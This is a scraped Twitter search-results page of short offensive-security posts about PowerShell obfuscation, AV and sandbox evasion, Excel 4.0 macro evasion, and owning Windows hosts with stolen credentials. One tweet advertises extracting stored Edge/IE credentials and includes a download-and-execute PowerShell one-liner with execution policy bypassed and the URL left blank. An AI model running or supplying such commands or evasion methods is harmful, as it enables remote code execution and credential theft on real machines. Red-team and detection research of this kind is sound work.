Search results
  1. Oct 31
  2. Nov 1
  3. Nov 1

    Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code

  4. Nov 1
  5. Nov 3

    Hide your Powershell script in plain sight. Bypass all (a lot of ;-) Powershell security features

  6. 18 hours ago
  7. 16 hours ago
  8. Oct 29
  9. Oct 27

    Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')"

  10. Nov 3

    Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM) - awesome post by my friend

  11. ❝ The good times never seem to last. Last night was fun and all, but it’s time that I got back to being a 𝑅𝑒𝑑 She-Hulk again. ❞ 😡

  12. Nov 3
  13. Nov 2

    Bypassing AV (Windows Defender) … Cat vs. Mouse - from 03/2019

  14. Nov 3
  15. Oct 30
  16. Oct 31
  17. 2 hours ago
  18. Nov 2
  19. Nov 3

    We are going live tonight at 7 PM EST. Season 4 episode 5 Tonight we are going to cover sandbox evasion technique to prevent payload execution in hostile environment. ❤

  20. Oct 30

    Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.